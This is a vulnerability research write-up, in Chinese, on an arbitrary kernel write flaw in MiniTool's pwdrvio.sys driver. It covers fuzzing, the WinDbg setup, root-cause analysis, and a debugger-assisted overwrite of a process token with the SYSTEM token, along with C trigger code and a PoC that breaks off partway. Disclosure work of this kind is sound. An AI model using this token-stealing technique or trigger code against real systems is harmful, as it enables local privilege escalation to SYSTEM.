项目日期:2026年2月 / MiniTool 内核驱动程序中的内存损坏漏洞。演示了一种借助调试器实现的任意内核写入原语,可用于权限提升。
MiniTool 的 pwdrvio.sys 内核驱动中存在内核写-写-何处(write-what-where)条件。演示了一种借助调试器实现的任意内核写入原语,可用于权限提升。
https://github.com/user-attachments/assets/ac81d7ce-0be7-40a5-9334-c54350e6e30e
任意内核写入 → 本地权限提升(LPE)
严重性: 高
CVSS 3.1 评分: 7.8(LPE)
CVSS 向量字符串:
LPE:CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
攻击前提条件:
利用结果: LPE - 已演示借助调试器实现的权限提升(NT AUTHORITY / SYSTEM),实现完全系统入侵
日期: 2026 年 2 月 5 日
活动: 使用自定义 Python 模糊测试器对内核驱动进行系统性模糊测试
发现过程:
目标选择:
pwdrvio.sys 识别为最旧的驱动(时间戳:2009 年 6 月 16 日)C:\Windows\System32\drivers\pwdrvio.sys\\.\PartitionWizardDiskAccesser\0初始模糊测试:
ctypes 开发 Python 模糊测试器以与驱动交互WriteFile/DeviceIoControl 向驱动设备发送随机数据验证程序激活:
验证器配置: ```
Verifier Flags: 0x001209bb
Standard Flags Enabled:
[X] Special pool
[X] Force IRQL checking
[X] Pool tracking
[X] I/O verification
[X] Deadlock detection
[X] DMA checking
[X] Security checks
[X] Miscellaneous checks
[X] DDI compliance checking
### WinDbg 内核调试设置
**日期:** 2026年2月5日至6日
**活动:** 建立内核调试环境以进行根本原因分析
**设置步骤:**
1. **VMware 串行端口配置:** ```
VMware Workstation Pro → VM Settings
├─ Add Hardware → Serial Port
├─ Connection: "Use named pipe"
├─ Path: \\.\pipe\com_1
├─ End: "This is the server"
└─ I/O Mode: "Yield CPU on poll" ✓
客户机操作系统配置: ```cmd REM Administrator Command Prompt bcdedit /debug on bcdedit /dbgsettings serial debugport:1 baudrate:115200 shutdown /r /t 0
主机 WinDbg 连接: ``` WinDbg → File → Attach to Kernel ├─ Port: \.\pipe\com_1 ├─ Baud Rate: 115200 ├─ Pipe: ✓ └─ Reconnect: ✓
Result: "Kernel Debugger connection established."
日期: 2026年2月6日
活动: 识别出任意内核写入原语
分析步骤:
模块分析: ```
1: kd> lm m pwdrvio
start end module name
fffff805315f0000 fffff805315f8000 pwdrvio (Jun 16 2009)
1: kd> !drvobj pwdrvio 2 Driver object (fffff805`XXXXXXXX) is for: \Driver\pwdrvio
DriverEntry: fffff805315f6008 DriverUnload: fffff805315f1060
Dispatch Routines:
[00] IRP_MJ_CREATE fffff805315f108c [02] IRP_MJ_CLOSE fffff805315f12f8
[03] IRP_MJ_READ fffff805315f16c4 [04] IRP_MJ_WRITE fffff805315f1564 ← Target
[0e] IRP_MJ_DEVICE_CONTROL fffff805`315f1404
易受攻击指令发现:
在写入处理器上设置断点: ``` 1: kd> bp pwdrvio+0x1641 1: kd> g
Breakpoint 0 hit pwdrvio+0x1641: fffff805`315f1641 498943f0 mov qword ptr [r11-10h],rax
关键发现: 已识别出任意写入原语!
RAX)写入地址 [R11-0x10]R11 从栈帧加载:mov r11, qword ptr [rbp+0xB8h]寄存器状态分析: ``` 0: kd> r rax=fffff805315f1364 ← Kernel code pointer r11=ffffe60f84c38750 ← Destination address (controlled via stack) rbp=ffffe60f84c38610 ← IRP stack frame
0: kd> dq @rbp+0xB8 L1
ffffe60f84c386c8 ffffe60f84c38750 ← R11 loaded from here
日期: 2026年2月6-7日
活动: 从释放后使用追踪漏洞到写-写-何处条件
内存破坏链:
IRP 分配: ``` 0: kd> !pool @rbp Pool page ffffe60f84c38610 region is Special pool *ffffe60f84c38000 size: 1f0 data: ffffe60f84c38e10 (NonPaged) *Irp+ Pooltag Irp+ : I/O verifier allocated IRP packets
缓冲区关系: ``` 0: kd> r rsi rsi=ffffe60f828df900 ← User buffer location
0: kd> ? @rbp - @rsi Evaluate expression: 35823344 = 00000000`02229ef0 ← 35MB difference!
分析: 用户缓冲区无法直接从 RBP 帧访问
RBP+0xB8 偏移量不指向用户可控缓冲区释放后使用(Use-After-Free)条件:
驱动程序在 IRP 结构中维护悬空指针: ```c // Ghidra decompilation (pwdrvio+0x1564) longlong lVar1 = *(longlong *)(param_2 + 0xb8); // Load from IRP
// No validation! lVar5 = IoBuildAsynchronousFsdRequest(...);
// Write to [lVar1 - 0x10] *(code **)(lVar3 + -0x10) = FUN_00011364; // Arbitrary write!
日期: 2026年2月7日至8日
活动: 开发令牌窃取技术
利用策略:
目标: 用SYSTEM令牌覆盖当前进程令牌
Windows EPROCESS结构:``` +0x000 Pcb : _KPROCESS ... +0x4b8 Token : _EX_FAST_REF ← Token pointer location
**令牌窃取流程:**
1. **定位 SYSTEM 进程:** ```
0: kd> !process 4 0
PROCESS ffffe7875ac86200
SessionId: none Cid: 0004 Peb: 00000000
Image: System
0: kd> dq ffffe7875ac86200+4b8 L1
ffffe787`5ac866b8 ffffc08e`6642f04f ← SYSTEM token value
定位攻击者进程: ``` 0: kd> !process 0 0 poc1.exe PROCESS ffffe78760150080 SessionId: 1 Cid: 0678 Image: poc1.exe
0: kd> dq ffffe78760150080+4b8 L1
ffffe78760150538 ffffc08e6c37a066 ← Standard user token
计算目标地址: ``` Target = TokenPointer + 0x10 = 0xffffe78760150538 + 0x10 = 0xffffe78760150548
Reason: Instruction uses [R11-0x10], so: (Target + 0x10) - 0x10 = Target
执行令牌覆盖: ``` 0: kd> r rax = ffffc08e6642f04f ; SYSTEM token 0: kd> r r11 = ffffe78760150548 ; Target address 0: kd> p ; Execute: mov [r11-10h],rax
0: kd> dq ffffe78760150538 L1 ; Verify
ffffe78760150538 ffffc08e6642f04f ← Token successfully changed!
恢复执行: ``` 0: kd> r rip = pwdrvio + 165f ; Skip to safe return 0: kd> r eax = 0 ; Return success 0: kd> bc * ; Clear breakpoints 0: kd> g ; Continue execution
结果: 进程现在拥有 SYSTEM 权限!
位置: pwdrvio.sys 偏移量 0x1641
汇编代码:```assembly
pwdrvio+0x1633: mov r11, qword ptr [rbp+0xB8h] ; Load pointer from IRP
pwdrvio+0x1641: mov qword ptr [r11-10h], rax ; Arbitrary write!
**触发机制:**```c
HANDLE hDevice = CreateFileA("\\\\.\\PartitionWizardDiskAccesser\\0",
GENERIC_READ | GENERIC_WRITE,
0, NULL, OPEN_EXISTING, 0, NULL);
char buffer[0x100];
DWORD bytesReturned;
WriteFile(hDevice, buffer, 0x100, &bytesReturned, NULL);
利用限制:
该漏洞需要内核调试工具才能可靠利用,原因如下:
寄存器控制挑战:
R11 从 [RBP+0xB8] 加载RBP 指向内核池中的 IRP 栈帧[RBP+0xB8]池内存布局: ``` RBP (IRP frame): 0xffffe60f84c38610 User buffer: 0xffffe60f828df900 Difference: 35,823,344 bytes (35 MB)
需要手动干预:
R11 寄存器设置为目标地址RAX 寄存器设置为 SYSTEM 令牌值指标:
代码:``` C #include <windows.h> #include <stdio.h>
int main() { HANDLE hDevice; DWORD bytesReturned; char buffer[0x100];
printf("[*] MiniTool PoC Trigger...\n");
printf("[*] Current User: "); system("whoami");